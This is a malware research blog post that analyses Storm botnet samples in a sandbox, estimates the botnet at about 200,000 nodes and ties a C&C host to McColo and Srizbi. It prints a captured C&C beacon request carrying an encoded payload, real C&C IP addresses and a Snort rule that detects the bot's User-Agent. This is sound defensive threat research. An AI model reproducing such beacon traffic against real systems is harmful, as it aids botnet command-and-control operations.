FireEye Malware Intelligence Lab

I got a chance to analyze the same binary 'postcard.exe'/'neos.exe' around 15 September. How I got this binary is already described in our earlier article published on 18 September.

http://blog.fireeye.com/research/2008/09/new-axis-of-evi.html

Jeremy’s article very well described neos.exe's (4840AF24FB1F82580B991C96BEAE4ABC) behavior around October 5th, but things were little bit different about three weeks ago, just before Storm took it's well documented hiatus.

At that time Storm was running as normal, although seemingly not as strong as it used to be. But still, many zombies could be seen communicating with each other using encrypted Overnet packets.  As usual, after some time it would download a new spam template and start sending spam. At that time it was selling male enhancement pills and some subject lines looked like:

"Restore your youth intimate life."
"Best places to get medications online, best strategies to save."

There were two things which caught my attention immediately. After some time 'neos.exe' downloaded another binary 'cpucooler.exe' (793872D28BAA210DB1F89DE28C67A98D). I was surprised to see that this was the unencrypted version of the storm, communicating via essentially plain text using the Overnet protocol. This was the very first time I saw encrypted and unencrypted traffic coming from the same machine. Both versions were using separate peer hash files and different source ports. ‘crock+mock.config’ was being used by the encrypted version 'neos.exe' and ‘cpucooler.ini’ was being used by the unencrypted version 'cpucooler.exe'.

My sandnet ran these two samples for about 2 days continuously and during this time I captured all the Overnet communication. From two days of monitoring, I was able to extract 120,610 active infected Storm hosts using encryption, and 44,844 that weren't.

The intersection of both IP sets was in the thousands, so our lab VMs were certainly not the first one to run both storm versions at a time. This was a worldwide Storm update.

We will provide the list of current Storm zombies to any interested parties not as a way to embarrass any enterprises, but simply as a way to back up our findings.  We need to do this as there are wildly different estimations of the size of Storm.  For instance, there was an article published an article last week citing Damballa, saying that Storm was only at 47,000 Bots.  Just counting the encrypted Bots you can see over 120,000 in a two day period, and you can bet that our lab VMs didn't talk with every other Bot in the network in that time. 

Another thing worth noting is the unencrypted version's outbound HTTP communication with the host ‘208.72.169.23’.  If you read our articles often, you'll immediately recognize that IP to exist inside one of the McColo subnets. For more information about McColo, refer to one of our earlier articles:

http://blog.fireeye.com/research/2008/08/srizbi-and-ru-1.html

This was the outbound HTTP communication:

POST /phq.gif HTTP/1.1 Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windoss NT 5.1; SV1921)
Host: 208.72.169.23
Content-Length: 415
Connection: Keep-Alive
Cache-Control: no-cache
a=eNplUE1Pg0AQvZPwH6Y3rbBffCwfMcZobZuo6YHG84YudCNdEKiSHvrb3VLbi5nLvPcm781MdJxQRjinfhyx/G.../LPGjBBOYurDi2plUQ+YIWKKw/I5uWiU29ZjnsvGxPVy6PGwqxzRNJXKRa9q/R9v+111d2LH8RNKv+4Jis+4qYTSIxE5amfuwI0unSmejlxwCXNfhS73Rk5AanffXfmZzuuN0mUC5UE1zkYWle...
b=fwAAAQ HTTP/1.1 200 OK

Server: nginx/0.6.32
Date: Thu, 18 Sep 2008 00:12:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.6 1248

Another thing very important about this host is that it's an immediate "IP neighbor" to one of the known Srizbi CnC hosts (208.72.169.22).  Not to beat a dead horse, but this shows another connection between Storm And Srizbi.

Another interesting nugget is "User-Agent" header:

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windoss NT 5.1; SV1921)

I guess the Storm author meant to type ‘Windows’ here, but fat-fingered it and made a typo.  There is a sig in Bleeding Snort that recognizes this mistake:
#storm c&c with a typo'd UA
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Storm C&C with typo'd User-Agent (Windoss)"; flow:established,to_server; content:"User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windoss NT"; depth:200; classtype:trojan-activity; sid:2007742; rev:3;)

Today I ran 'cpucooler.exe' and 'neos.exe' again. I can still see lots of Overnet communication, both encrypted and non.  This simply means that today, Storm's Command and Control is still alive, it's just not downloading spam templates, and hence, not sending spam.  Researchers who monitor Storm strictly from a SPAM aspect came to the conclusion that it is dead, but from a Botnet point of view, Storm is very much alive.   http://www.marshal.com/trace/traceitem.asp?article=786

SPAM is an interesting way to monitor Botnets, but if one has the ability (by being deployed in ISPs, NSPs, large enterprises, etc), they would be able to see the broader Command and Control traffic for these Botnets.  These types of deployments allow our researchers to monitor Botnet communication on a much larger scale, especially when the "payload" of the Botnet is nonexistent or temporarily silent.  We believe that the mass download of neos.exe, which is capable of downloading spam templates and new binaries, shows that it is far too early to say that Storm will not be back.

As far as Storm's TCP communication is concerned (Storm is generally UDP), I got the same results for both versions.  Most peers were resetting TCP SYN with the message "Reset cause: Go away, we're not home".  The team here got a little kick out of that message when we saw it.  I remember I also saw this kind of messages in RST packets in case of 'Nugache' around February this year.

Download nugache_tcpport_8.pcap

In conclusion, by looking at our short sample, there were at least 165,454 zombies actively participating in Storm. As these 165,454 hosts were extracted from just two days of monitoring, we can safely assume that Storm was around 200,000 nodes at that time.  We picked two days as it's a healthy medium between "a reasonable DHCP lease" and "the length of time necessary for a zombie to communicate with most other zombies". 

Atif Mushtaq & Alex Lanstein @ FireEye Malware Intelligence Labs